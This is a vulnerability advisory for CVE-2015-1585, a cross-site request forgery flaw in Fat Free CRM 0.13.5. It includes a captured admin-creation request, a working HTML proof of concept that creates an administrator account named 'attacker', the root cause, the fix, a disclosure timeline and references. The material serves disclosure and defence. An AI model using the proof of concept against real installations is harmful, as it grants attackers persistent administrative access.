Fat Free CRM 0.13.5 Cross Site Request Forgery Vulnerability
2015-02-16T00:00:00
ID: 1337DAY-ID-23295 | Type: zdt | Reporter: Sven Schleier | Modified: 2015-02-16T00:00:00
Description
Fat Free CRM version 0.13.5 suffers from a cross site request forgery vulnerability.
[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5
----------------------------------------------------------------
Product Information:
Software: Fat Free CRM
Tested version: 0.13.5, released 22.1.2015, with over 10,000 downloads
Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)
Download link: https://rubygems.org/gems/fat_free_crm/versions/0.13.5
Description: An open source, Ruby on Rails customer relationship management platform (CRM). Out of the box it features group collaboration, campaign and lead management, contact lists, and opportunity tracking (copied from https://github.com/fatfreecrm/fat_free_crm)
----------------------------------------------------------------
Vulnerability description:
When an authenticated administrative user of Fat Free CRM creates another user account, the browser sends the following POST request (cookie values replaced by the placeholders $foo1 and $foo2):
POST /admin/users HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: oxZgwOAtzNdFJU85jPqmI+g893lQaOy6ctCCzef42qI=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:3000/admin
Content-Length: 356
Cookie: _session_id=$foo1; user_credentials=$foo2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
utf8=%E2%9C%93&authenticity_token=oxZgwOAtzNdFJU85jPqmI%2Bg893lQaOy6ctCCzef42qI%3D&user%5Busername%5D=admin1&user%5Bemail%5D=test1%40test.de&user%5Bpassword%5D=1&user%5Bpassword_confirmation%5D=1&user%5Badmin%5D=0&user%5Badmin%5D=1&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Btitle%5D=&user%5Bcompany%5D=&user%5Bgroup_ids%5D%5B%5D=&commit=Create+User
As can be seen, the application already sends a CSRF token in the parameter authenticity_token (and, because this form is submitted via XHR, in the X-CSRF-Token header as well), and the token has sufficient entropy. The server, however, does not require it: a POST without authenticity_token is processed exactly like one with a valid token. The request itself points at the likely reason. The login is persisted in a separate user_credentials cookie in addition to the Rails _session_id, and Rails' default reaction to a missing or invalid token (the :null_session strategy, or reset_session in older Rails versions) only discards the session for that one request; a request that is still authenticated by the persistence cookie therefore goes through. Loading the following proof of concept in the browser of a logged-in administrator creates a new administrative user called "attacker" with the password 1234, without any token being sent:
<html>
  <body>
    <!-- Same target and parameters as the captured request, minus authenticity_token.
         A cross-site form post carries the victim's cookies but cannot set
         X-CSRF-Token or X-Requested-With, so only the body parameters are sent. -->
    <form action="http://127.0.0.1:3000/admin/users" method="POST">
      <!-- Rails' utf8 marker: the check mark U+2713 -->
      <input type="hidden" name="utf8" value="&#10003;" />
      <input type="hidden" name="user[username]" value="attacker" />
      <input type="hidden" name="user[email]" value="test@test.org" />
      <input type="hidden" name="user[password]" value="1234" />
      <input type="hidden" name="user[password_confirmation]" value="1234" />
      <input type="hidden" name="user[admin]" value="1" />
      <input type="hidden" name="commit" value="Create User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
----------------------------------------------------------------
Impact:
Every state-changing operation within Fat Free CRM sends the parameter authenticity_token in order to prevent CSRF attacks. Because the server never requires that parameter, every one of these operations can be triggered by a CSRF attack against a logged-in user; creating an administrative account, as in the proof of concept above, is the most severe case, since it gives the attacker persistent access that survives the victim's session.
----------------------------------------------------------------
Solution:
Update to version 0.13.6 (the latest release at the time of writing) or later, see https://rubygems.org/gems/fat_free_crm/versions/0.13.6
The vendor's description of the issue and the fix: https://github.com/fatfreecrm/fat_free_crm/wiki/CSRF-Vulnerability-%28CVE-2015-1585%29
Independently of the vendor's patch, the general Rails hardening for this class of bug is protect_from_forgery with: :exception in ApplicationController, which makes a missing or invalid authenticity_token abort the request with ActionController::InvalidAuthenticityToken instead of merely dropping the session. Installations that ran 0.13.5 should also review the user list for unexpected administrative accounts, since a successful attack leaves one behind.
----------------------------------------------------------------
Timeline:
Vulnerability found: 11.2.2015
Vendor informed: 11.2.2015
Response by vendor: 12.2.2015
Fix by vendor: 12.2.2015
Public Advisory: 14.2.2015
----------------------------------------------------------------
Best regards,
Sven Schleier
# 0day.today [2018-02-19] #
----------------------------------------------------------------
References:
CVE-2015-1585 (NVD, published 2015-02-19): https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1585
NVD description: Fat Free CRM before 0.13.6 allows remote attackers to conduct cross-site request forgery (CSRF) attacks via a request without the authenticity_token, as demonstrated by a crafted HTML page that creates a new administrator account.
CWE: CWE-352
CVSS v2: 6.8 (Medium), AV:N/AC:M/Au:N/C:P/I:P/A:P
CPE: cpe:2.3:a:fatfreecrm:fat_free_crm:0.13.5:*:*:*:*:*:*:*
0day.today (1337DAY-ID-23295, 2015-02-16): https://0day.today/exploit/23295
Packet Storm (130410, 2015-02-16): https://packetstormsecurity.com/files/130410/Fat-Free-CRM-0.13.5-Cross-Site-Request-Forgery.html
SecurityVulns (DOC:31733, 2015-02-22): https://vulners.com/securityvulns/SECURITYVULNS:DOC:31733
SecurityVulns web application vulnerabilities summary (VULN:14273, 2015-02-23): https://vulners.com/securityvulns/SECURITYVULNS:VULN:14273